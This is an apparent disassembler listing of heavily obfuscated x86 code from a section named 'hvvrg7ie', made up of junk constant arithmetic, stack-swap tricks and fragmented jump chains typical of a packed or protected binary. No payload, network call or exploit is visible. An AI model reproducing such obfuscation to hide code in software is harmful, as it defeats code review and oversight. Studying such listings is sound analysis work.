; [00000001 BYTES: COLLAPSED FUNCTION nullsub_407. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DE

loc_45B21D:				; CODE XREF: sub_4421DE+9F0Bj
		shr	ebx, 7
		popf
		xor	edi, 5000D44Eh
		jmp	loc_453376
; END OF FUNCTION CHUNK	FOR sub_4421DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_45B22C:				; CODE XREF: sub_43DB4C:loc_43D2D3j
		mov	eax, ds:dword_448D1C
		or	eax, eax
		jnz	loc_44BB7A
		jmp	loc_459D90
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458931

loc_45B23F:				; CODE XREF: sub_458931+Fj
		pop	ecx
		add	ecx, 0D9B58E54h
		rol	ecx, 1
		add	ecx, 50BFDD50h
; END OF FUNCTION CHUNK	FOR sub_458931
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_45B24E:				; CODE XREF: sub_453E08:loc_445B7Fj
		mov	[ecx], eax
		pop	ecx
		jmp	loc_44B40C
; END OF FUNCTION CHUNK	FOR sub_453E08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_45B256:				; CODE XREF: sub_43D5FD:loc_453BF4j
		jz	loc_4565DF
		jmp	loc_4521E3
; END OF FUNCTION CHUNK	FOR sub_43D5FD

; =============== S U B	R O U T	I N E =======================================



sub_45B261	proc near		; CODE XREF: hvvrg7ie:00441E50j
					; sub_44397Fp

; FUNCTION CHUNK AT 0043D677 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044418E SIZE 00000013 BYTES

		xchg	ecx, [esp+0]

loc_45B264:				; CODE XREF: hvvrg7ie:0043F4AFj
		pop	ecx
		push	edx
		push	978703ADh
		pop	edx
		xor	edx, 0F17967C5h
		cmp	edx, 0B62E211h
		jmp	loc_44418E
sub_45B261	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C485

loc_45B27D:				; CODE XREF: sub_43C485+7j
		jnb	loc_448325
		adc	eax, edi
		jmp	loc_43C082
; END OF FUNCTION CHUNK	FOR sub_43C485
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_45B28A:				; CODE XREF: sub_442FD1:loc_44205Ej
					; sub_442FD1+17704j
		call	sub_44531A
; END OF FUNCTION CHUNK	FOR sub_442FD1
; START	OF FUNCTION CHUNK FOR sub_448768

loc_45B28F:				; CODE XREF: sub_448768+BB46j
		jmp	nullsub_458
; END OF FUNCTION CHUNK	FOR sub_448768
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_45B294:				; CODE XREF: sub_458095-1B576j
					; sub_458095:loc_44420Ej
		push	eax
		lea	eax, loc_457B58
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		jmp	loc_44EE19
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------

loc_45B2A6:				; CODE XREF: hvvrg7ie:0043DA10j
					; hvvrg7ie:loc_43FE2Bj
		sub	ebp, 9C633F35h

; =============== S U B	R O U T	I N E =======================================



sub_45B2AC	proc near		; CODE XREF: sub_448DE4-15F9p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C51C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043C52D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043F6B6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00440D53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443A7D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B707 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458E9E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459DCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AD41 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, edx
		jmp	loc_459DCE
sub_45B2AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_45B2B7:				; CODE XREF: sub_44C6D7:loc_454E48j
		test	esi, ecx
		jmp	loc_446FA1
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_45B2BE:				; CODE XREF: sub_44AB90:loc_45255Bj
		mov	ds:dword_439CB0, eax
		retn
; ---------------------------------------------------------------------------

loc_45B2C5:				; CODE XREF: sub_44AB90:loc_45424Aj
		push	offset loc_45526E
		jmp	nullsub_459
; END OF FUNCTION CHUNK	FOR sub_44AB90
; ---------------------------------------------------------------------------

loc_45B2CF:				; DATA XREF: sub_44C1BB+1o
		push	8C94FF6Eh
		pop	ebx
		xor	ebx, 29C40AA5h
		rol	ebx, 7
		or	ebx, 2C42B8BDh
		add	ebx, 2B05ED5Ch
		cmp	ebx, 7FE17078h
		jmp	loc_445C21
; ---------------------------------------------------------------------------

locret_45B2F5:				; CODE XREF: hvvrg7ie:loc_448D20j
		retn
; ---------------------------------------------------------------------------
		call	nullsub_26
		jmp	ds:dword_41D164
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jno	loc_457632
		mov	eax, [esp]
		push	eax
		mov	eax, edx
		jmp	loc_44BBD0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453CA3

loc_45B314:				; CODE XREF: sub_453CA3-16572j
		jmp	sub_445B46
; END OF FUNCTION CHUNK	FOR sub_453CA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD3E

loc_45B319:				; CODE XREF: sub_44DD3E:loc_43D669j
		push	esi
		mov	esi, eax
		xchg	esi, [esp+8+var_8]
		mov	edx, eax

loc_45B321:				; CODE XREF: sub_4596EB:loc_448856j
		call	sub_451429
		sub	ecx, 94C79C84h
		ror	esi, 3
		jmp	loc_44502E
; END OF FUNCTION CHUNK	FOR sub_44DD3E

; =============== S U B	R O U T	I N E =======================================



sub_45B334	proc near		; CODE XREF: hvvrg7ie:004474CCp
					; hvvrg7ie:00451883j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F6A0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045155E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00451C9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A666 SIZE 00000020 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	edx
		push	esi
		jmp	loc_451C9B
sub_45B334	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_516. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_45B340:				; CODE XREF: sub_452F78+15j
		jmp	loc_43A6FB
; END OF FUNCTION CHUNK	FOR sub_452F78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_45B345:				; CODE XREF: sub_44BEBB+1B86j
		jmp	sub_439549
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_45B34A:				; CODE XREF: sub_454789-12126j
		pop	esi
		xor	eax, 9D7D5D55h
		add	eax, 0AAFB265Dh

loc_45B357:				; CODE XREF: sub_446D8D+3ECDj
		xor	eax, ds:4000F2h
		rol	eax, 16h
		jmp	loc_43D58A
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_45B365:				; CODE XREF: sub_453BBD:loc_446E50j
					; hvvrg7ie:0044DA5Dj
		or	edx, 0B7D4A15Bh
		and	edx, 0FCFAF25Bh
		add	edx, 37480B1h
		mov	edx, [edx]
		jmp	loc_45B38B
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------

loc_45B37E:				; DATA XREF: sub_43EBB6+7FD9o
		add	eax, [ebp-4]
		call	sub_44F66B
		call	sub_44290B
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_45B38B:				; CODE XREF: sub_453BBD+77BCj
		jmp	loc_454512
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_45B390:				; CODE XREF: sub_43A839:loc_454984j
					; hvvrg7ie:0045A8EEj
		jmp	loc_453FE1
; END OF FUNCTION CHUNK	FOR sub_43A839

; =============== S U B	R O U T	I N E =======================================



sub_45B395	proc near		; DATA XREF: sub_44D730+Eo

; FUNCTION CHUNK AT 004486D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B68B SIZE 00000003 BYTES

		or	eax, eax
		jnz	loc_44B68B
		jmp	loc_4486D0
sub_45B395	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45B3A2:				; CODE XREF: hvvrg7ie:00439D15j
		jnp	loc_440677
		jnb	loc_43A5E0
		jmp	loc_457C45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_45B3B3:				; CODE XREF: sub_44BCAE-8F0Bj
		jl	loc_43E34D

loc_45B3B9:				; CODE XREF: sub_458E44+Bj
		jmp	loc_459FCB
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563DC

loc_45B3BE:				; CODE XREF: sub_4563DC+Dj
		jmp	loc_43EF7C
; END OF FUNCTION CHUNK	FOR sub_4563DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E84

loc_45B3C3:				; CODE XREF: sub_443E84+1Bj
		jmp	loc_457C36
; END OF FUNCTION CHUNK	FOR sub_443E84
; ---------------------------------------------------------------------------
		mov	esi, ecx
		jl	loc_442A39
		js	loc_43B5F1
		jmp	loc_43E34D
; ---------------------------------------------------------------------------
		rol	ebx, 2
		jmp	sub_45A889
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_45B3E3:				; CODE XREF: sub_453422-C110j
		shr	edx, 3
		mov	ecx, ds:dword_448D10
		js	loc_44929C
		or	[ecx+edx], al
		push	4B3D1615h
		jmp	loc_4527BB
; END OF FUNCTION CHUNK	FOR sub_453422

; =============== S U B	R O U T	I N E =======================================



sub_45B3FF	proc near		; CODE XREF: hvvrg7ie:00448DDFj
					; sub_454D37+Ap

; FUNCTION CHUNK AT 0043DFFA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044BAA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E2C8 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	edx, [edx]
		shr	edx, 3
		mov	ecx, ds:dword_448D10
		or	[ecx+edx], al
		jmp	loc_44E2C8
sub_45B3FF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_45B416:				; CODE XREF: sub_44955C+B6A7j
		jge	loc_44AB64

loc_45B41C:				; CODE XREF: sub_44955C:loc_459A23j
		push	1A17C8DBh
		sub	eax, 0C1EF7967h
		jmp	loc_451760
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B8B1

loc_45B42C:				; CODE XREF: sub_45B8B1+11j
		rol	edx, 16h
		add	edx, 132D96AAh

loc_45B435:				; CODE XREF: hvvrg7ie:004445AFj
		xchg	edx, [esp+0]
		jmp	nullsub_20
; END OF FUNCTION CHUNK	FOR sub_45B8B1
; ---------------------------------------------------------------------------

loc_45B43D:				; DATA XREF: sub_43EA21:loc_43E8D0o
		shl	al, cl

loc_45B43F:				; CODE XREF: hvvrg7ie:0043978Ej
		push	8A4B3015h
		pop	edx
		sub	edx, 3DB3AF52h
		or	edx, 0F80CFA51h
		sub	edx, ds:4000F1h
		jmp	loc_454D7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AAE4

loc_45B45C:				; CODE XREF: sub_43AAE4+1D6ADj
		sub	ecx, 5763E567h
		add	ecx, 669776D2h
		mov	ecx, [ecx]
		or	[ecx+edx], al
		push	27F0BE48h
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		jmp	loc_43E6CC
; END OF FUNCTION CHUNK	FOR sub_43AAE4
; ---------------------------------------------------------------------------
		jnz	loc_44D0F7
		popf
		jmp	sub_452609
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458992

loc_45B489:				; CODE XREF: sub_458992+Bj
		mov	ebp, edx
		xchg	ebp, [esp-4+arg_0]
		mov	edx, eax
		call	sub_456F18

loc_45B495:				; CODE XREF: sub_44934B-3CC6j
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_458992
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_45B49A:				; CODE XREF: sub_4533F2:loc_43AFACj
		mov	eax, edx
		call	sub_450FB5

loc_45B4A1:				; CODE XREF: hvvrg7ie:0044A124j
		jmp	loc_453F0B
; END OF FUNCTION CHUNK	FOR sub_4533F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_207. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45B4A7:				; CODE XREF: hvvrg7ie:00459E44j
		jmp	loc_454CD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_45B4AC:				; CODE XREF: sub_44D149:loc_444399j
		jns	loc_448C11
		cdq
		jmp	loc_4520BC
; END OF FUNCTION CHUNK	FOR sub_44D149
; ---------------------------------------------------------------------------

loc_45B4B8:				; CODE XREF: hvvrg7ie:0043A771j
		add	esi, 0DF4D1419h
		cmp	esi, 9C0116EAh
		jmp	loc_43DB8B
; ---------------------------------------------------------------------------

loc_45B4C9:				; CODE XREF: hvvrg7ie:loc_458EDDj
		mov	eax, [esp]
		push	edx
		call	sub_44CEC8
		push	0BA96AD8Fh
		pop	eax
		jmp	loc_450E3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_45B4DD:				; CODE XREF: sub_4518BD-9462j
		jnz	loc_45B15B
		pop	edi
		rol	edi, 7
		jmp	loc_45B159
; END OF FUNCTION CHUNK	FOR sub_4518BD
; ---------------------------------------------------------------------------

loc_45B4EC:				; CODE XREF: hvvrg7ie:0044BB9Aj
		jz	loc_457691
		jmp	loc_449953
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45B4F7:				; CODE XREF: sub_43E128+B916j
		mov	eax, edx
		nop
		mov	eax, [esp+0]
		call	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_43E128
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_258. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEA9

loc_45B503:				; CODE XREF: sub_43EEA9+12AF5j
		jmp	loc_4569E6
; END OF FUNCTION CHUNK	FOR sub_43EEA9
; ---------------------------------------------------------------------------
dword_45B508	dd 0			; DATA XREF: sub_43D30A+6r
					; sub_43D30A:loc_4583BBr
; ---------------------------------------------------------------------------

loc_45B50C:				; DATA XREF: sub_43CD0B:loc_4439ADo
		push	2448828h
		pop	eax
		rol	eax, 0Ch
		push	offset loc_4510C0
		jmp	loc_447141
; ---------------------------------------------------------------------------

loc_45B51F:				; DATA XREF: hvvrg7ie:loc_440677o
		push	edi
		mov	edi, ebx
		xchg	edi, [esp]
		mov	ebx, edx
		xchg	ebx, [esp]
		call	sub_44F7CF
		mov	eax, 0F75CA70h
		push	ecx
		jmp	loc_43E2AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_45B53A:				; CODE XREF: sub_453BBD:loc_451968j
		cmp	ebx, 442A2BD0h
		jmp	loc_4525A3
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_45B545:				; CODE XREF: sub_446B4C-2D5Dj
		call	sub_4550CA

loc_45B54A:				; CODE XREF: sub_44F776+Aj
		jmp	loc_45B1E3
; END OF FUNCTION CHUNK	FOR sub_446B4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_45B54F:				; CODE XREF: sub_43D285+16933j
		jl	loc_443C69
		not	esi
		jle	loc_44CAA6

loc_45B55D:				; CODE XREF: sub_43D285:loc_43A01Fj
		call	sub_4571C8
		jmp	loc_44C872
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_45B567:				; CODE XREF: sub_45A7E8-BCF5j
		jz	loc_449993
		jmp	loc_44F36F
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------
		add	ebp, 72C8FD5Fh
		jmp	sub_443A00
; ---------------------------------------------------------------------------
		mov	[edi], eax
		jmp	loc_447366
; ---------------------------------------------------------------------------

loc_45B584:				; CODE XREF: hvvrg7ie:00456682j
		sbb	edx, ecx

; =============== S U B	R O U T	I N E =======================================



sub_45B586	proc near		; CODE XREF: sub_43C0DE+90EDp
		xchg	eax, [esp+0]
		pop	eax
		pop	edi

loc_45B58B:				; CODE XREF: sub_440C05:loc_43C082j
		mov	eax, [eax]
		mov	al, [eax]
		jmp	loc_449D84
sub_45B586	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45B594:				; CODE XREF: hvvrg7ie:0044BAD0j
		pop	esi
		push	offset loc_458EDD

loc_45B59A:				; CODE XREF: hvvrg7ie:loc_4447E3j
		jmp	locret_44F316
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_45B5A0:				; CODE XREF: sub_4557D4+2A3Aj
		jmp	sub_44612F
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_45B5A5:				; CODE XREF: sub_44C6BE+370Dj
		jmp	loc_457168
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_45B5AA:				; CODE XREF: sub_44D4EF-F668j
		jmp	nullsub_465
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_248. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_45B5B0:				; CODE XREF: sub_443BCD+EC77j
		jmp	sub_43F98C
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_45B5B5:				; CODE XREF: sub_43E063+8BC7j
		call	sub_439549
		call	sub_44BEBB

loc_45B5BF:				; CODE XREF: sub_43DB4C+E031j
		jmp	loc_4524A4
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_45B5C4:				; CODE XREF: sub_448BC0:loc_459762j
		add	ebx, 75456773h
		or	ebx, 0AE115DD7h
		add	ebx, 0AA97B9h
		popf
		jmp	loc_4563C7
; END OF FUNCTION CHUNK	FOR sub_448BC0

; =============== S U B	R O U T	I N E =======================================



sub_45B5DC	proc near		; CODE XREF: sub_44A2D1-7A4Cp
					; hvvrg7ie:004597C4j
		xchg	esi, [esp+0]
		pop	esi
		call	sub_441E44
		push	offset sub_449517
		jmp	nullsub_467
sub_45B5DC	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_45B5F0:				; CODE XREF: sub_445B46-5B6Cj
		jmp	loc_44B430
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44680C

loc_45B5F5:				; CODE XREF: sub_44680C:loc_4428E8j
		xchg	edi, [esp+0]
		call	sub_4525FC
		mov	eax, 4C5D3995h
		call	sub_450C5A
		push	ebx
		push	90A6B69Ah
		pop	ebx
		jmp	loc_44B358
; END OF FUNCTION CHUNK	FOR sub_44680C
; ---------------------------------------------------------------------------

loc_45B613:				; CODE XREF: hvvrg7ie:00452129j
		call	sub_458931

loc_45B618:				; CODE XREF: hvvrg7ie:0045A7A4j
		jmp	loc_457E29
; ---------------------------------------------------------------------------

loc_45B61D:				; CODE XREF: hvvrg7ie:0045A432j
		jmp	loc_456269
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514E0

loc_45B622:				; CODE XREF: sub_4514E0:loc_45A47Cj
		xchg	ebx, [esp+4+var_4]
		jmp	loc_455225
; END OF FUNCTION CHUNK	FOR sub_4514E0
; ---------------------------------------------------------------------------
		jmp	ds:off_41D140
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_45B630:				; CODE XREF: sub_44BCAE-EDj
		jmp	loc_45595D
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_45B635:				; CODE XREF: sub_450810-15B65j
					; sub_44CAB0-819j ...
		jno	loc_44C29C
		pop	edx
		push	offset loc_441D16
		jmp	loc_43E792
; END OF FUNCTION CHUNK	FOR sub_450810
; ---------------------------------------------------------------------------
		push	4AA6070Ch
		pop	eax
		add	eax, 8054B6D3h
		jnb	loc_45550D
		shr	ecx, 1Eh
		jmp	loc_455504
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_456. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F71

loc_45B661:				; CODE XREF: sub_455F71-1CA70j
		jnz	loc_43BBDE
		sub	esi, ecx
		and	ebp, ebx
		or	ecx, eax
		jmp	loc_43BBD8
; END OF FUNCTION CHUNK	FOR sub_455F71
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B44

loc_45B673:				; CODE XREF: sub_439B44+13CCDj
		jmp	nullsub_470
; END OF FUNCTION CHUNK	FOR sub_439B44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_45B678:				; CODE XREF: sub_456A52-D865j
		jmp	loc_439107
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

loc_45B67D:				; CODE XREF: hvvrg7ie:00448AB5j
		pushf

loc_45B67E:				; CODE XREF: hvvrg7ie:loc_448A9Cj
		and	eax, 26AB69ADh
		add	eax, 0E044A288h
		call	sub_450C5A
		mov	ds:dword_41D194, eax
		jmp	loc_445DB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_45B69A:				; CODE XREF: sub_4468C2:loc_4423D0j
		pop	ecx
		add	ecx, 336871E8h
		sub	ecx, 0D130E80Bh
		test	ecx, 40000h
		jmp	loc_454182
; END OF FUNCTION CHUNK	FOR sub_4468C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_45B6B2:				; CODE XREF: sub_44C8FB+Cj
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44BB1F
		jmp	loc_43F657
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F5D

loc_45B6C1:				; CODE XREF: sub_455F5D+Fj
		add	eax, 0A691A202h
		xor	eax, 5992CA7Fh
		add	eax, 334C63E1h
		xchg	eax, [esp+0]
		jmp	loc_448C3A
; END OF FUNCTION CHUNK	FOR sub_455F5D

; =============== S U B	R O U T	I N E =======================================



sub_45B6DB	proc near		; CODE XREF: sub_44C9B0p
					; hvvrg7ie:00458C13j

var_2CC		= dword	ptr -2CCh

; FUNCTION CHUNK AT 00447EC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B900 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFD38h
		lea	eax, [ebp-0Ch]
		push	ebp
		jmp	loc_447EC7
sub_45B6DB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45B6F1	proc near		; CODE XREF: hvvrg7ie:0043D999p
					; hvvrg7ie:0044C021j
		xchg	esi, [esp+0]
		pop	esi
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]

loc_45B6FB:				; CODE XREF: hvvrg7ie:00448CE3j
		ror	eax, 7
		mov	ds:dword_459D74, eax
		retn
sub_45B6F1	endp

; ---------------------------------------------------------------------------

loc_45B705:				; CODE XREF: hvvrg7ie:0044C126j
		sub	edx, 0C00C9872h

; =============== S U B	R O U T	I N E =======================================



sub_45B70B	proc near		; CODE XREF: sub_445CCD:loc_44D92Dp

; FUNCTION CHUNK AT 00441B4E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444D3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447FAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C4B2 SIZE 0000001D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_44DE0A
		jmp	loc_444D3C
sub_45B70B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45B719:				; CODE XREF: hvvrg7ie:00439AC7j
		jns	locret_4589EB
		xor	esi, ebx

; =============== S U B	R O U T	I N E =======================================



sub_45B721	proc near		; CODE XREF: sub_456FF3+6p

; FUNCTION CHUNK AT 00453FAF SIZE 0000000C BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		push	eax
		jmp	loc_453FAF
sub_45B721	endp


; =============== S U B	R O U T	I N E =======================================



sub_45B72C	proc near		; DATA XREF: hvvrg7ie:0044CD43o

; FUNCTION CHUNK AT 0043ADCA SIZE 00000012 BYTES

		push	0FFFFFFFFh
		push	eax
		push	1B8701C0h
		pop	eax
		jmp	loc_43ADCA
sub_45B72C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_45B73A:				; CODE XREF: sub_450AA8:loc_43E823j
					; sub_450AA8-DCCFj
		call	sub_44DA1A

loc_45B73F:				; CODE XREF: sub_443DF4+14B21j
		jmp	sub_44F7CF
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
		push	9EE2431Dh
		pop	eax
		and	eax, 0C03EBF3Dh
		xor	eax, 0EE323D75h
		jmp	loc_451D47
; ---------------------------------------------------------------------------

loc_45B75B:				; DATA XREF: sub_44973C-61E2o
		mov	al, [eax]
		jo	loc_442A7C
		sub	al, 99h
		push	45C84DD0h
		pop	edx
		jmp	loc_43914F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DA1A

loc_45B770:				; CODE XREF: sub_44DA1A+Cj
		push	0E9822447h
		pop	ebx
		xor	ebx, 0FAB57D9Ch
		test	ebx, 1000h
		jmp	loc_45A80E
; END OF FUNCTION CHUNK	FOR sub_44DA1A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D9F9

loc_45B787:				; CODE XREF: sub_43D9F9:loc_4510ABj
		pop	eax
		xor	eax, 654F8DA0h
		sub	eax, 0E5FFDD51h
		add	eax, 76BE6613h
		xor	eax, 0E82B3063h
		push	esi
		push	0D995F642h
		pop	esi
		jmp	loc_448F8E
; END OF FUNCTION CHUNK	FOR sub_43D9F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_45B7AC:				; CODE XREF: sub_43B3BE:loc_450871j
		jz	loc_447CE9
		jmp	loc_43925A
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------

loc_45B7B7:				; CODE XREF: hvvrg7ie:004402B9j
		jz	loc_45AE83

; =============== S U B	R O U T	I N E =======================================



sub_45B7BD	proc near		; CODE XREF: hvvrg7ie:00444F07p

; FUNCTION CHUNK AT 00443F80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF58 SIZE 00000009 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebp
		mov	ebp, eax
		jmp	loc_443F80
sub_45B7BD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF96

loc_45B7C9:				; CODE XREF: sub_43AF96:loc_455BADj
		jz	loc_457194
		jmp	loc_453981
; END OF FUNCTION CHUNK	FOR sub_43AF96
; ---------------------------------------------------------------------------
		call	sub_452C40
		jl	loc_43E2ED
		jmp	sub_456EAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_45B7E4:				; CODE XREF: sub_451E6D-188Cj
		call	sub_442B5C

loc_45B7E9:				; CODE XREF: hvvrg7ie:0043D477j
		jmp	loc_4430B2
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
